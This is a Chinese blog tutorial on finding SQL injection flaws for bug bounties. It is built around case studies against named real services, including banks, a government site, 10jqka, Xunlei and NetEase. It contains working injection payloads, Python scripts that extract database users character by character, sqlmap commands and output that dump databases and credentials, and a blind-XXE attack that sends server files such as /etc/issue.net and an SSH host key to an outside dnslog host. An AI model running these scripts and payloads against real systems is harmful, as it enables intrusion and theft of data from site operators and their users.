首页 > 数据库 >WEB漏洞挖掘详细教程--用户输入合规性(sql注入测试)

WEB漏洞挖掘详细教程--用户输入合规性(sql注入测试)

时间:2024-04-06 14:58:05浏览次数:25  
标签:WEB http -- 盲注 xxx mid user sql ascii

前置教程:
WEB漏洞挖掘(SRC)详细教程--信息收集篇-CSDN博客

WEB漏洞挖掘(SRC)详细教程--身份认证与业务一致性-CSDN博客

WEB漏洞挖掘(SRC)详细教程--业务数据篡改-CSDN博客

2.4 用户输入合规性

2.4.1 注入测试

a. 手动注入

1.在参数中输入一个单引号”' ”,引起执行查询语句的语法错误,得到服务器的错误回显, 从而判断服务器的数据库类型信息。 根据数据库类型构造sql注入语句。

例如一个get方式的url[ http://www.Xxx.com/abc.asp?p=YY ]

修改p的参数值http://www.Xxx.com/abc.asp?p=YY and user>0

就可以判断是否是 SQL-SERVER,而还可以得到当前连接到数据库的用户名。 http://www.xxx.com/abc.asp?p=YY&n … db_name()>0

不仅可以判断是否是SQL-SERVER,而 还可以得到当前正在使用的数据库名 。

2.盲注,大部分时候web服务器关闭了错误回显。

http://www.xxx.com/abc.asp?p=1 and 1=2

sql命令不成立,结果为空或出错 ;

http://www.xxx.com/abc.asp?p=1 and 1=1

sql命令成立,结果正常返回 。

两个测试成功后,可以判断负载的sql被执行,存在sql注入漏洞。

手动注入网站示例。登录密码(‘or’1’=‘1)并成功进入管理后台。

a.aLimit后盲注

案例:同花顺一处limit后盲注(ROOT权限/跨11库)

检测发现以下地方存在SQL注入:(注入参数limit,limit后时间盲注)

[http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class](http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class) 
ify=1&flag=fancy&limit=3&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1

Payload:(延时7秒)

[http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class](http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class) 
ify=1&flag=fancy&limit=1/**/procedure/**/analyse(extractvalue(1,benchmark(25000
000,md5(111))),1)+--+-&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1

1.当前数据库用户,ROOT

2.所有数据库,共11个

a.bSql盲注

案列:263通信某APP一处SQL盲注(附验证脚本)

263网络会议 3.0 软件下载_产品客户端下载_263云通信

下载APP,"快速入会"功能,接口:

POST [http://cc.263.net/rest/netmeeting/quickLoginNet](http://cc.263.net/rest/netmeeting/quickLoginNet) HTTP/1.1 
Content-Type: application/json;charset=UTF-8
Content-Length: 65 
Host: cc.263.net 
Connection: Keep-Alive
{"pCode":"46867588","username":"lisi","clientType":10}

注入点:pCode

bool盲注。

false:

true:

数据库用户:

[email protected]

python验证脚本:

headers = {'Content-Type': 'application/json;charset=UTF-8'} 
payloads = 'ABCDEFGHIJKLMNOPQRSTYVWXYZ0123456789@_.'
print '[%s] Start to retrive db User:' % time.strftime('%H:%M:%S', 
time.localtime())
user = '' isEnd=False
for i in range(1, 36): 
    if isEnd:
      break 
    isEnd=True
    for payload in payloads: 
    url='/rest/netmeeting/quickLoginNet' 
    start_time=time.time() 
    data='{"pCode":"46867588\' or
MID(user(),'+str(i)+',1)=''+payload+'","username":"lisi","clientType":10}'
    conn = httplib.HTTPConnection('cc.263.net', timeout=60) 
    conn.request(method='POST',url=url,body=data, headers=headers) 
    html_doc = conn.getresponse().read()
    conn.close() 
    print '.',
    if(html_doc.find('80007')>0): 
       isEnd=False
       user += payload
       print '\n[in progress]', user, 
       break
    time.sleep(0.1)
print '\n[Done] db user is %s' % user 
time.sleep(20)

a.c伪静态db2布尔盲注

案列:某银行主站伪静态DB2布尔盲注

http://.../bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c1 2f9

http://.../Site/Home/CN

没waf 直接上sqlmap 未脱库

available databases [10]:

[] *DB2INST1

[] * NULLID

[*] SQLJ

[] * SYSCAT

[] *SYSFUN

[*] SYSIBM

[] *SYSIBMADM

[] *SYSPROC

[*] SYSSTAT

[*] SYSTOOLS

current database: 'CMSDB'

database management system users [1]:

[*] DB2INST1

[313 tables]

+--------------------------------+

| ADVISE_WORKLOAD |

| AREA |

| AREA_EMAIL |

| COMPANY_LOANS |

| D2S_BLOCK_TEMPLATEMAP |

| D2S_CHANEL_CHANEL_RELATIONSHIP |

| D2S_CHANNEL_BLOCKMAP |

| D2S_CHANNEL_INFO_RELATIONSHIP |

| D2S_CHANNEL_TEMPLATEMAP |

| D2S_INFO_BLOCKMAP |

| D2S_INFO_CHANNEL_RELATIONSHIP |

| D2S_INFO_INFO_RELATIONSHIP |

| D2S_INFO_TEMPLATEMAP |

| D2S_TEMPLATE |

| EMAIL_SEND_LOG |

a.d伪静态sql布尔盲注

案列:某银行主站伪静态sql布尔盲注root

http://...//cmsDeskArticle/bankCardType/1 注入点

经测试 information_schema不能用,sqlmap神器也悲伤 肯花时间的话 可以猜的出表

漏洞证明:

工具跑不了

1' or length(database())=7 and 1=1 or '1'='

1' or ascii(mid((database()),1,1))=102 and 1=1 or '1'=' f

1' or ascii(mid((database()),2,1))=120 and 1=1 or '1'=' x

1' or ascii(mid((database()),3,1))=45 and 1=1 or '1'=' -

1' or ascii(mid((database()),4,1))=98 and 1=1 or '1'=' b

1' or ascii(mid((database()),5,1))=97 and 1=1 or '1'=' a

1' or ascii(mid((database()),6,1))=110 and 1=1 or '1'=' n

1' or ascii(mid((database()),7,1))=107 and 1=1 or '1'=' k

fx-bank

1' or ascii(mid(version(),1,1))=53 and 1=1 or '1'=' m

1' or ascii(mid(version(),2,1))=46 and 1=1 or '1'=' .

1' or ascii(mid(version(),3,1))=53 and 1=1 or '1'=' 5

1' or ascii(mid(version(),4,1))=46 and 1=1 or '1'=' .

1' or ascii(mid(version(),5,1))=50 and 1=1 or '1'=' 2

1' or ascii(mid(version(),6,1))=49 and 1=1 or '1'=' 1

1' or ascii(mid(version(),7,1))=45 and 1=1 or '1'=' -

1' or ascii(mid(version(),8,1))=108 and 1=1 or '1'=' 1

1' or ascii(mid(version(),9,1))=111 and 1=1 or '1'=' o

1' or ascii(mid(version(),10,1))=103 and 1=1 or '1'=' g

m.5.21-log

1' or ascii(mid(user(),1,1))=114 and 1=1 or '1'=' r

1' or ascii(mid(user(),2,1))=111 and 1=1 or '1'=' o

1' or ascii(mid(user(),3,1))=111 and 1=1 or '1'=' o

1' or ascii(mid(user(),4,1))=116 and 1=1 or '1'=' t

1' or ascii(mid(user(),5,1))=64 and 1=1 or '1'=' @

1' or ascii(mid(user(),6,1))=108 and 1=1 or '1'=' l

root@localhost

a.e时间盲注

案列:迅雷一处时间盲注

抓的post包

POST /location/upload_peerinfo HTTP/1.1 
Host: [interface.xl9.xunlei.com](http://interface.xl9.xunlei.com)
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101
Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate 
DNT: 1
Cookie: sessionid=CC824A20602118045BF9B8150499AD86; userid=50947382; 
peerid=50E549E88890F5GQ; client=pc; v=7.10.33.358
Connection: keep-alive 
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded 
Content-Length: 74
{"cpu":"","devicename":"ZHONGWEN","devicetype":"pc","imei":"","memory":""}

devicename\devicetype 都是注入点


Parameter: JSON devicename ((custom) POST) 
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  Payload: {"cpu":"","devicename":"ZHONGWEN' AND (SELECT * FROM 
  (SELECT(SLEEP(5)))DEhT) AND 
  'AgGq'='AgGq","devicetype":"pc","imei":"","memory":""}
  Parameter: JSON devicetype ((custom) POST) 
      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
      Payload: {"cpu":"","devicename":"ZHONGWEN","devicetype":"pc' AND (SELECT * 
  FROM (SELECT(SLEEP(5)))KNUs) AND 'HTgX'='HTgX","imei":"","memory":""}

available databases [6]:

[*] xl9\x81\x81omplain

[*] information_schema

[*] x

[*] xl9_location

[*] xl9_tracer

[*] xl9_user_ip_loc

[15:55:53] [INFO] fetching tables for database: 'xl9_user_ip_loc'

[15:55:53] [INFO] fetching number of tables for database 'xl9_user_ip_loc' [15:55:53] [INFO] resumed: 257

xl9_user_ip_loc 这个库挺大的 都是用户记录的ip吧 。

a.fOracle盲注

案列:新疆人社厅Oracle盲注(附验证脚本)

注入地址:

http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151 590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 AND 'xxx'='xxx

参数id过滤不严格导致SQLi

http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151 590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 AND 'xxx'='xxx

返回正常

http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151 590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=4 AND 'xxx'='xxx

返回不一样,判断用户名为3个字符 直接放进脚本跑。这里举例CURRENT_USER和OS_USER,其他类似

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: 
import requests
url = 
"http://**.**.**.**/wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e015
1590e127808da"
payloads='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789@_.'
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) 
Gecko/20100101 Firefox/45.0",
"Cookie":"JSESSIONID=5V1JXjMpQLtR92RxJ62KrMQLfY4t6xpdQCBfcXLHtT2yz4jsT7Gr!1
478879510",
"Accept":""
}
def getData():
user=''
for i in range(1,4,1):
for exp in list(payloads):
try:
payload = "'AND 
substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1)='%s' AND 'xxx'='xxx" % 
(i,''.join(exp))
r = requests.get(url + 
payload,headers=header,allow_redirects=False,timeout=100)
res = r.text
#print exp
if res.find("20151130234113") >0 :
user+=exp
print '\n user is:',user,
except:
pass
print '\n[Done] Oracle user is %s' %user
def getDataBase():
user=''
for i in range(0,13,1):
for exp in list(payloads):
try:
payload = "'AND 
substr(SYS_CONTEXT('USERENV','OS_USER'),%s,1)='%s' AND 'xxx'='xxx" % 
(i,''.join(exp))
r = requests.get(url + 
payload,headers=header,allow_redirects=False,timeout=100)
res = r.text
#print exp
if res.find("20151130234113") >0 :
user+=exp
print '\n OS_USER is:',user,
except:
pass
print '\n[Done] Oracle OS_USER is %s' %user
if __name__ == '__main__':
#len = getLength()
getData()
getDataBase()

验证结果:

a.gXxe盲注

案列:利用网易一处XXE盲注演示如何通过cloudeye配合实现文件内容读取

野生xml外部实体注入

地址:http://106.2.32.66:8080/webdav/

IP归属地:

存在一处webdav目录,支持通过PROPFIND方式提交xml结构请求 构造xxe测试payload:

PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like 
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtz3zkd [
 <!ENTITY % dtd SYSTEM "http://66ae2b.dnslog.info/">
%dtd;]>
<propfind xmlns="DAV:"><allprop/></propfind>

cloudeye apache 日志:

response 返回数据:

<?xml version="1.0" encoding="utf-8" ?>
<multistatus xmlns="DAV:"><response><href>/webdav/</href>
<propstat><prop><creationdate>2015-07-13T12:13:57Z</creationdate>
<displayname><![CDATA[]]></displayname>
<resourcetype><collection/></resourcetype>
<source></source>
<supportedlock><lockentry><lockscope><exclusive/></lockscope><locktype><write/>
</locktype></lockentry><lockentry><lockscope><shared/></lockscope><locktype><wr
ite/></locktype></lockentry></supportedlock>
</prop>
<status>HTTP/1.1 200 OK</status>
</propstat>
</response>
</multistatus>

证明解析xml时尝试引用了外部资源,存在XXE漏洞

后续尝试构造xml请求获取回显失败,考虑继续通过cloudeye获取blind xxe回显结果。 创建一个获取回显结果的dtd文件:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 
'http://66ae2b.dnslog.info/?xml1=%payload;'>">
%all;

调用地址:http://...:8080/xml/evil.dtd 再次构造请求payload读取hostname:

PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like 
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
 <!ENTITY % payload SYSTEM "file:///proc/sys/kernel/hostname">
 <!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>

cloudeye apache日志:

获取的hostname为:classa-popoatispam1,貌似是网易popo的反垃圾邮件系统 由于读取带有换行符、#、<、>等特殊符号文件内容时,会破坏xml语法结构,导致payload 无法正常解析,所以还做不到任意文件读取,可以尝试寻找base64、urlencode编码方法来 解决,反正我是没有搞定/(ㄒoㄒ)/~~ 但是也可以读到好多有价值的内容,比如读取/etc/issue.net:

PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like 
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
 <!ENTITY % payload SYSTEM "file:///etc/issue.net">
 <!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>

结果为:Debian%20GNU/Linux%207

读取/etc/ssh/ssh_host_rsa_key.pub:

PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like 
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
 <!ENTITY % payload SYSTEM "file:///etc/issue.net">
 <!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>

结果为:

ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQCcdWadpFCGUL9soWpo7KIc4/WlcwkcvqOeMfnCS 4sSmT+fsQ1FMY+h6Ab+xQrvrhp4ufIN/iR92SMeIYLCxg+DSIXKdxKob9luJKdF/zl4UY/qTmRaQaAP lAgZsPHnBMKT5BW08ZMX+NzH8jQQx6xHCkx4Bqom88NMfePN0ydYwGzehS/7oh0s9JYgo8knTJ6eke7 y/ohtzMLjCoBQHfAOTtyRPoFSyfc2ksU/rZOvAPteQvmhyc1geAmngcGV0eabzhSmNHcrxqeKZ5wK7z OmoGeoEZrfxADCHlDbf6P+XJ3HjgDZg1iBHNH4hjkdNGkVCaxpRg9CD+V/G3Ddn0Xl%20root@class a-popoatispam1

b. 自动化工具检测注入

SQLmap–检测与利用SQL注入漏洞的免费开源工具

sqlmap.py –u 【指定url 】 –cookie –dbs //列出数据库

sqlmap.py –u 【指定url 】 - D 【数据库名】- -tables //列出某个库的数据表 sqlmap.py –u 【指定url 】-D 【数据库名】-T 【数据表名】–columns //列出数据表的 列名

sqlmap.py –u 【指定url 】-D dvwa -T users-C user,password –dump //把用户名密码列 出来(sqlmap自动破解密码)

某网站拖库示例

案例:兴业银行某站存在SQL注入

http://shop.cib.com.cn//?m=product&s=detail&id=457 存在注入

标签:WEB,http,--,盲注,xxx,mid,user,sql,ascii
From: https://blog.csdn.net/qq_59468567/article/details/137377772

相关文章

  • 030、送杨氏女
    030、送杨氏女唐●韦应物永日方戚戚,出行复悠悠。女子今有行,大江溯轻舟。尔辈苦无恃,抚念益慈柔。幼为长所育,两别泣不休。对此结中肠,义往难复留。自小阙内训,事姑贻我忧。赖兹托令门,任恤庶无尤。贫俭诚所尚,资从岂待周。孝恭遵妇道,容止顺其猷。别离在今晨,见尔当何秋?居闲......
  • 每日一题:1483. 树节点的第 K 个祖先
    给你一棵树,树上有 n 个节点,按从 0 到 n-1 编号。树以父节点数组的形式给出,其中 parent[i] 是节点 i 的父节点。树的根节点是编号为 0 的节点。树节点的第 k 个祖先节点是从该节点到根节点路径上的第 k 个节点。实现 TreeAncestor 类:TreeAncestor(intn,int[]......
  • 031、东郊
    031、东郊唐●韦应物吏舍跼终年,出郊旷清曙。杨柳散和风,青山澹吾虑。依丛适自憩,缘涧还复去。微雨霭芳原,春鸠鸣何处。乐幽心屡止,遵事迹犹遽。终罢斯结庐,慕陶直可庶。 【现代诗演译】经年的,憋烦在办公衙门里。清晨、郊外、清新曙色,开阔了我的心胸。 杨柳、春风、青......
  • 大一下 软件工程与计算 20240406
    1.科里化deflambda_curry2(func):"""ReturnsaCurriedversionofatwo-argumentfunctionFUNC."""returnlambdax:lambday:func(x,y)这段代码定义了一个名为lambda_curry2的函数,它接受一个有两个参数的函数func作为输入,并返回一个新的函数。这个返回的函数实......
  • TVM Pass优化 -- 公共子表达式消除(Common Subexpr Elimination, CSE)
    定义(What)公共子表达式消除就是如果表达式E的值已经计算的到了,并且自计算的到值后E的值就不再改变了,就说,表达式E在后续计算中是一个公共表达式。简单说,该表达式上面已经执行过了,下面没必要再执行了举个例子:importtvmfromtvmimportrelayfromtvm.relayimporttransform......
  • G. Rudolf and Subway
     原题的无向图等价于上图所示的联通图,此时我们要求的就是起始位置到终止位置最少要经过几个有颜色的结点。code #include<bits/stdc++.h>usingnamespacestd;constintN=4e5+5;intvis[N];intmain(){//freopen("input.txt","r",stdin);intt;cin>>t;......
  • CNCKAD数冲激光编程排版软件介绍
    CNCKAD是一种集成了CAD和CNC的软件,它可以导入各种图形和CAD文件格式,比如DXF、DWG和IGES,帮助用户创建复杂的3D模型、独特的几何形状和特殊的设计要求。CNCKAD的核心功能是自动化的刀具路径生成,它可以通过多种方式生成刀具路径,包括手动、自动、半自动和机器学习等方法,这些技术可以确......
  • Photoshop混合模式的底层原理
        Photoshop虽然不是什么高手,但平时工作中难免会用到,处理部分需求还是可以胜任的。接触PS这么多年,对PS中图层的混合模式(BlendMode)一直就处于懵懂状态,即使是看了教材及视频后,有了一点感性认识,但在实际操作中仍旧无法运用起来。直至某一天,我在B站看到韩世麟的《把PS......
  • C#词法分析自动生成器
    C#词法分析自动生成器前言在做编译原理实验时,要求使用自动生成器生成词法分析器,老师推荐的是用flex,但用flex只会生成C代码,自己项目用的又是C#,本来想使用C代码直接生成dll库并用C#调用,但非常麻烦。干脆找了个能生成C#代码的生成器。配置相关的生成器很多,但我能找到的且能成功......
  • 劫持TLS绕过canary pwn89
    劫持TLS绕过canarypwn88首先了解一下这个东西的前提条件和原理前提:溢出字节够大,通常至少一个page(4K)创建一个线程,在线程内栈溢出原理:在开启canary的情况下,当程序在创建线程的时候,会创建一个TLS(ThreadLocalStorage),这个TLS会存储canary的值,而TLS会保存在stack高地址......